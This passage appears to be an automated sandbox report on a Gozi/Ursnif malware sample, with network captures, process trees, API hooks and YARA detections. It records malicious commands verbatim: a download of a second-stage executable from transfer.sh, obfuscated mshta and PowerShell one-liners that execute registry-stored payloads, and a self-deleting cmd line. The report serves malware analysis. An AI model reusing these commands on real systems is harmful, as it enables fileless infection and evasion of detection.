Jan 12, 2022 13:04:10.510899067 CET	11162	OUT	Data Raw: 0d 0a Data Ascii:
Jan 12, 2022 13:04:10.981787920 CET	11163	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 12 Jan 2022 12:04:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49743	144.76.136.153	443	C:\Users\user\Desktop\gozi.exe

Timestamp	kBytes transferred	Direction	Data
2022-01-12 12:01:26 UTC	0	OUT	GET /get/3dvhcv/lia.exe HTTP/1.1 Host: transfer.sh Connection: Keep-Alive
2022-01-12 12:01:27 UTC	0	IN	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Wed, 12 Jan 2022 12:01:27 GMT Content-Type: application/x-ms-dos-executable Content-Length: 37888 Connection: close Content-Disposition: attachment; filename="lia.exe" Retry-After: Wed, 12 Jan 2022 13:01:32 GMT X-Made-With: <3 by DutchCoders X-Ratelimit-Key: 127.0.0.1,102.129.143.64,102.129.143.64 X-Ratelimit-Limit: 10 X-Ratelimit-Rate: 600 X-Ratelimit-Remaining: 9 X-Ratelimit-Reset: 1641988892 X-Remaining-Days: n/a X-Remaining-Downloads: n/a X-Served-By: Proudly served by DutchCoders
2022-01-12 12:01:27 UTC	0	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 fd 6a 64 18 b9 0b 0a 4b b9 0b 0a 4b b9 0b 0a 4b b0 73 99 4b b3 0b 0a 4b b9 0b 0b 4b ee 0b 0a 4b 7a 04 57 4b ba 0b 0a 4b 9e cd 7b 4b a5 0b 0a 4b 9e cd 76 4b b8 0b 0a 4b 9e cd 72 4b b8 0b 0a 4b 52 69 63 68 b9 0b 0a 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 3f 7e b6 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 12 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$jdKKKsKKKKzWKK{KKvKKrKKRichKPEL?~a
2022-01-12 12:01:27 UTC	16	IN	Data Raw: b6 f6 1d c4 e2 90 89 6d 56 09 39 c6 8b 04 02 b9 1e 03 66 7d a2 0d 40 de 0c 3d 95 b0 a8 dc 02 8b 2c 3c 14 6e f1 56 2b 79 b8 f4 53 57 8d b4 df 3c 11 55 a7 0e 99 8b c5 5f 39 60 71 95 bb 28 bd 94 ae fc fe 4e c2 d9 06 7c b3 1b db a0 89 50 24 63 07 09 0f 8c 91 56 ab 80 5d f8 75 18 68 c8 e1 2a 76 ed 4c db 5b 52 6b 4b 47 22 fc 7c 6f d9 68 92 5b d2 64 f4 7e 23 32 6a 01 ce 48 4f 7c 82 ce f4 76 e5 cb 10 ad 2f 47 12 8d 34 3f 04 1f 19 16 e3 c2 1f 74 0f 34 41 04 fb e6 ec a2 b4 4c 67 ce 0e 1d 95 80 35 22 dc 9f 1c 61 cb 06 4d 04 ad 18 c3 10 3f aa 01 f6 da 58 a1 c4 4a a2 20 ab 48 56 50 95 99 94 be bc 92 a7 7f 06 0c 64 1e 44 3c a1 4e 08 8c a5 07 17 83 ee 64 05 87 7f e6 33 30 5e 25 22 50 19 67 a1 d2 92 41 0f 10 b1 3d 33 a4 c3 a0 26 db 86 6a 7f 5a 16 1e 56 85 d2 dd 2a d3 f6 Data Ascii: mV9f}@=,<nV+ySW<U_9`q(N\|P$cV]uhvL[RkKG"\|oh[d~#2jHO\|v/G4?t4ALg5"aM?XJ HVPdD<Nd30^%"PgA=3&jZV
2022-01-12 12:01:27 UTC	32	IN	Data Raw: b9 c2 e0 00 5d f3 b8 89 22 f5 ba 1f 00 2d b7 be 24 0b 31 ab 93 00 70 c5 c9 ed c6 f2 74 ce 0f 4b d9 91 da 04 1a 75 08 e1 98 f1 21 0f 92 fb e1 eb e0 21 4c 78 11 78 84 78 c1 78 24 78 3f 78 6d 78 a9 78 43 e5 e3 84 87 cd 87 99 87 31 87 16 87 cb 8f be 1e 0a 1e 12 1e ea 1e 96 00 9d 91 d3 39 53 e2 00 d5 15 59 90 e3 fc a1 76 78 b6 78 47 78 f9 78 b5 78 af 00 d2 8f d7 6b 23 eb d1 14 00 d8 48 b6 66 22 2e fd 1e 00 ce 4c b0 62 27 f4 b3 15 3e cf 84 00 29 1c e3 ba 49 a6 43 78 f7 07 4e 28 8a 0a ae 50 26 77 3a 1c 00 7d 01 b6 56 2c 33 0c d0 f0 48 07 e7 9b 34 2b 0d 80 4c 09 9f a9 74 19 1e 47 5d 89 1e 90 1f 2c 1e 66 1f 8d 1e 8a 1f 1a 1e 62 1b 9b 18 3c 11 84 3e 91 3c 6c 3e 26 3c 80 72 f8 7b f0 38 f8 7e f0 70 f9 f7 c0 d3 15 88 03 6a 7a fc e2 b0 cb c0 a5 55 78 f0 a2 40 b1 e5 78 Data Ascii: ]"-$1ptKu!!Lxxxx$x?xmxxC19SYvxxGxxxk#Hf".Lb'>)ICxN(P&w:}V,3H4+LtG],fb<><l>&<r{8~pjzUx@x

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
CreateProcessAsUserW	EAT	explorer.exe
CreateProcessAsUserW	INLINE	explorer.exe
CreateProcessW	EAT	explorer.exe
CreateProcessW	INLINE	explorer.exe
CreateProcessA	EAT	explorer.exe
CreateProcessA	INLINE	explorer.exe
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	explorer.exe
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	explorer.exe

Processes

Process: explorer.exe, Module: KERNEL32.DLL

Function Name	Hook Type	New Data
CreateProcessAsUserW	EAT	7FFC8BAF521C
CreateProcessAsUserW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessW	EAT	7FFC8BAF5200
CreateProcessW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessA	EAT	7FFC8BAF520E
CreateProcessA	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00

Process: explorer.exe, Module: WININET.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFC8BAF5200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	5AF8E58

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFC8BAF5200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	5AF8E58

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: gozi.exe PID: 6992 Parent PID: 1372

General

Start time:	13:01:13
Start date:	12/01/2022
Path:	C:\Users\user\Desktop\gozi.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\gozi.exe"
Imagebase:	0xe10000
File size:	167424 bytes
MD5 hash:	8EE79738C37A919FDF38DC5A621556CE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 5696 Parent PID: 6992

General

Start time:	13:01:29
Start date:	12/01/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Imagebase:	0x8e0000
File size:	64616 bytes
MD5 hash:	6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000008.00000003.392490032.0000000003408000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000008.00000002.523377381.000000000308F000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000008.00000003.392591901.0000000003408000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000008.00000003.392517903.0000000003408000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000008.00000003.392607938.0000000003408000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000008.00000003.392570642.0000000003408000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000008.00000003.398744797.0000000003389000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000008.00000003.405030349.000000000320C000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000008.00000003.392542209.0000000003408000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000008.00000003.395416668.0000000003408000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: mshta.exe PID: 2928 Parent PID: 3352

General

Start time:	13:02:13
Start date:	12/01/2022
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\mshta.exe" "about:<hta:application><script>Djqr='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Djqr).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>
Imagebase:	0x7ff60d5c0000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 6536 Parent PID: 2928

General

Start time:	13:02:16
Start date:	12/01/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))
Imagebase:	0x7ff777fc0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5400 Parent PID: 6536

General

Start time:	13:02:16
Start date:	12/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: csc.exe PID: 6620 Parent PID: 6536

General

Start time:	13:02:28
Start date:	12/01/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline
Imagebase:	0x7ff71b850000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Chronological Activities

Analysis Process: cvtres.exe PID: 4876 Parent PID: 6620

General

Start time:	13:02:30
Start date:	12/01/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F8.tmp" "c:\Users\user\AppData\Local\Temp\CSC8CA7551FEF4543EEA6FB885A13AF16EB.TMP"
Imagebase:	0x7ff60f590000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: csc.exe PID: 5700 Parent PID: 6536

General

Start time:	13:02:33
Start date:	12/01/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5n300s0s.cmdline
Imagebase:	0x7ff71b850000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Chronological Activities

Analysis Process: control.exe PID: 5676 Parent PID: 5696

General

Start time:	13:02:34
Start date:	12/01/2022
Path:	C:\Windows\System32\control.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\control.exe -h
Imagebase:	0x7ff7edb10000
File size:	117760 bytes
MD5 hash:	625DAC87CB5D7D44C5CA1DA57898065F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000001C.00000000.468518313.0000000000E50000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000001C.00000000.470699283.0000000000E50000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001C.00000003.473486452.000001DC0EF2C000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001C.00000003.473394409.000001DC0EF2C000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000001C.00000000.472358807.0000000000E50000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001C.00000003.473504593.000001DC0EF2C000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cvtres.exe PID: 5664 Parent PID: 5700

General

Start time:	13:02:35
Start date:	12/01/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8712.tmp" "c:\Users\user\AppData\Local\Temp\CSC31C5CF8C116B47DEB51FEE2BA7A26AB5.TMP"
Imagebase:	0x7ff71aa50000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: explorer.exe PID: 3352 Parent PID: 6536

General

Start time:	13:02:44
Start date:	12/01/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff720ea0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 2960 Parent PID: 3352

General

Start time:	13:03:02
Start date:	12/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Imagebase:	0x7ff7e2850000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 4580 Parent PID: 2960

General

Start time:	13:03:03
Start date:	12/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: PING.EXE PID: 3640 Parent PID: 2960

General

Start time:	13:03:04
Start date:	12/01/2022
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping localhost -n 5
Imagebase:	0x7ff604fb0000
File size:	21504 bytes
MD5 hash:	6A7389ECE70FB97BFE9A570DB4ACCC3B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 4364 Parent PID: 5676

General

Start time:	13:03:08
Start date:	12/01/2022
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Imagebase:	0x7ff71e070000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000024.00000000.539555209.0000020FDEA80000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000024.00000000.537792307.0000020FDEA80000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000024.00000003.540930276.0000020FDF04C000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000024.00000003.541170125.0000020FDF04C000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000024.00000000.535827896.0000020FDEA80000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: RuntimeBroker.exe PID: 4084 Parent PID: 3352

General

Start time:	13:03:08
Start date:	12/01/2022
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:	0x7ff6225d0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000025.00000000.568184534.000001B920020000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000025.00000000.563482706.000001B920020000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000025.00000000.572793373.000001B920020000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: cmd.exe PID: 4488 Parent PID: 3352

General

Start time:	13:03:19
Start date:	12/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\3B0F.bi1"
Imagebase:	0x7ff7e2850000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: RuntimeBroker.exe PID: 4176 Parent PID: 3352

General

Start time:	13:03:29
Start date:	12/01/2022
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:	0x7ff6225d0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000029.00000000.609566601.00000163C5170000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000029.00000000.615563963.00000163C5170000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000029.00000002.824135960.00000163C5171000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000029.00000000.621795530.00000163C5170000.00000040.00020000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: conhost.exe PID: 5016 Parent PID: 4488

General

Start time:	13:03:33
Start date:	12/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: nslookup.exe PID: 5340 Parent PID: 4488

General

Start time:	13:03:33
Start date:	12/01/2022
Path:	C:\Windows\System32\nslookup.exe
Wow64 process (32bit):	false
Commandline:	nslookup myip.opendns.com resolver1.opendns.com
Imagebase:	0x7ff725f40000
File size:	86528 bytes
MD5 hash:	AF1787F1DBE0053D74FC687E7233F8CE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 3200 Parent PID: 3352

General

Start time:	13:03:39
Start date:	12/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\3B0F.bi1"
Imagebase:	0x7ff7e2850000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: RuntimeBroker.exe PID: 4440 Parent PID: 3352

General

Start time:	13:03:52
Start date:	12/01/2022
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase:	0x7ff6225d0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002D.00000000.652250920.000001EAE4570000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002D.00000000.655957739.000001EAE4570000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002D.00000000.648045274.000001EAE4570000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002D.00000002.819337222.000001EAE4571000.00000020.00020000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: conhost.exe PID: 4292 Parent PID: 3200

General

Start time:	13:03:56
Start date:	12/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6020 Parent PID: 3352

General

Start time:	13:04:08
Start date:	12/01/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002F.00000003.672226246.0000000003508000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002F.00000003.671882459.0000000003508000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002F.00000003.671987567.0000000003508000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002F.00000003.672047552.0000000003508000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002F.00000003.671936053.0000000003508000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002F.00000003.672143247.0000000003508000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002F.00000003.672170468.0000000003508000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002F.00000002.673705435.0000000003508000.00000004.00000040.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: conhost.exe PID: 5656 Parent PID: 6020

General

Start time:	13:04:09
Start date:	12/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: gozi.exe PID: 6992 Parent PID: 1372 gozi.exeCOMMON

Execution Graph

Execution Coverage:	14.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.8%
Total number of Nodes:	163
Total number of Limit Nodes:	14

Executed Functions

Function 07C26030, Relevance: .4, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.329375842.0000000007C20000.00000040.00000001.sdmp, Offset: 07C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c20000_gozi.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 3a3712e436013792201b076ffdeb2f9c9a21ad5f6e4458410c91b2814534d0db
Instruction ID: 89027e6cbd123529fc817051aed513dbd9b00887986f759af4d90d2a0a52d53f
Opcode Fuzzy Hash: 3a3712e436013792201b076ffdeb2f9c9a21ad5f6e4458410c91b2814534d0db
Instruction Fuzzy Hash: 05F18DB0A00219CFDB14CFA9C888BADBBF1FF48314F158569E405AF665DB70E946DB50

Uniqueness

Uniqueness Score: -1.00%

Function 07C27060, Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.329375842.0000000007C20000.00000040.00000001.sdmp, Offset: 07C20000, based on PE: false

